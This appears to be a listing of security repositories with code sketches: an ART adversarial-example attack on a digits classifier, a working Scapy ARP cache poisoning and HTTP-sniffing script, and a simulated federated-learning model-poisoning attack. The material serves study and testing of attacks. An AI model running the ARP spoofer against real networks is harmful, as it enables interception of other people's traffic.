Adversarial Robustness Toolbox (ART) - Python Library for Machine Learning Security - Evasion, Poisoning, Extraction, Inference - Red and Blue Teams
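Below is a minimal sketch of how ART is typically driven, here mounting an evasion attack (Fast Gradient Method) against a scikit-learn model. FastGradientMethod and SklearnClassifier are part of ART's public API; the digits dataset and logistic-regression model are illustrative assumptions, not taken from the repository.

```python
# Minimal sketch of an ART evasion attack, assuming ART 1.x.
# The dataset and model choices below are illustrative.
import numpy as np
from sklearn.datasets import load_digits
from sklearn.linear_model import LogisticRegression
from art.estimators.classification import SklearnClassifier
from art.attacks.evasion import FastGradientMethod

X, y = load_digits(return_X_y=True)
X = X / 16.0  # scale pixel values into [0, 1]
model = LogisticRegression(max_iter=1000).fit(X, y)

# Wrap the fitted model so ART can compute loss gradients against it.
classifier = SklearnClassifier(model=model, clip_values=(0.0, 1.0))

# Craft adversarial examples with the Fast Gradient Method.
attack = FastGradientMethod(estimator=classifier, eps=0.2)
X_adv = attack.generate(x=X)

print("clean accuracy:      ", model.score(X, y))
print("adversarial accuracy:", model.score(X_adv, y))
```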
MITM ARP cache poisoner implemented with Scapy, together with an HTTP sniffer
Python script for ARP spoofing
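A minimal sketch of the ARP cache poisoning technique these scripts implement, using Scapy's standard ARP/Ether primitives. The IP addresses are placeholders, the helper names are mine, and running this requires root privileges on a network you are authorized to test.

```python
# ARP cache poisoning sketch with Scapy (op=2 is an unsolicited ARP reply).
# Enable IP forwarding on the attacker host so the MITM does not cut traffic.
import time
from scapy.all import ARP, Ether, send, sniff, srp

def get_mac(ip):
    """Resolve a MAC address by broadcasting an ARP request."""
    ans, _ = srp(Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(pdst=ip),
                 timeout=2, verbose=False)
    return ans[0][1].hwsrc if ans else None

def poison(victim_ip, gateway_ip):
    victim_mac = get_mac(victim_ip)
    gateway_mac = get_mac(gateway_ip)
    if victim_mac is None or gateway_mac is None:
        raise RuntimeError("could not resolve MAC addresses")
    while True:
        # Tell the victim we are the gateway, and the gateway we are the victim.
        send(ARP(op=2, pdst=victim_ip, hwdst=victim_mac, psrc=gateway_ip),
             verbose=False)
        send(ARP(op=2, pdst=gateway_ip, hwdst=gateway_mac, psrc=victim_ip),
             verbose=False)
        time.sleep(2)

def sniff_http():
    """Print summaries of plaintext HTTP packets now routed through us."""
    sniff(filter="tcp port 80", prn=lambda pkt: pkt.summary(), store=False)
```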
Simulation of federated learning (FL) in Python for a digit-recognition ML model; simulates poisoning attacks and studies their impact.
This study explores the vulnerability of the federated learning (FL) model in a setting where a portion of the clients participating in the FL process is controlled by adversaries who have no access to the training data but can access the training model and its parameters.
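That threat model (tamper with the model update, not the data) can be demonstrated with a short federated-averaging simulation. The NumPy sketch below is mine, not from the repository: honest clients run a step of least-squares SGD while a malicious client flips and scales its update, and the clean and poisoned runs are compared.

```python
# Minimal FedAvg sketch with one model-poisoning client.
# All names and the least-squares task are illustrative assumptions.
import numpy as np

def local_update(global_weights, data, lr=0.1):
    """One step of least-squares SGD as a stand-in for local training."""
    X, y = data
    grad = X.T @ (X @ global_weights - y) / len(y)
    return global_weights - lr * grad

def fedavg_round(global_weights, client_data, malicious_ids, boost=10.0):
    deltas = []
    for cid, data in enumerate(client_data):
        delta = local_update(global_weights, data) - global_weights
        if cid in malicious_ids:
            delta = -boost * delta  # adversary flips and scales its update
        deltas.append(delta)
    return global_weights + np.mean(deltas, axis=0)

rng = np.random.default_rng(0)
true_w = rng.normal(size=5)
clients = [(X, X @ true_w) for X in (rng.normal(size=(50, 5)) for _ in range(10))]

w_clean = np.zeros(5)
w_poisoned = np.zeros(5)
for _ in range(100):
    w_clean = fedavg_round(w_clean, clients, malicious_ids=set())
    w_poisoned = fedavg_round(w_poisoned, clients, malicious_ids={0})

print("error without attack:", np.linalg.norm(w_clean - true_w))
print("error with attack:   ", np.linalg.norm(w_poisoned - true_w))
```

Even a single boosted client out of ten is enough here to keep the global model from converging, which is the kind of impact such a simulation is built to measure.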
A project by Lane Affield, Emma Gerdeman, and Munachi Okuagu showcasing what we have learned through Drake University's Artificial Intelligence Program.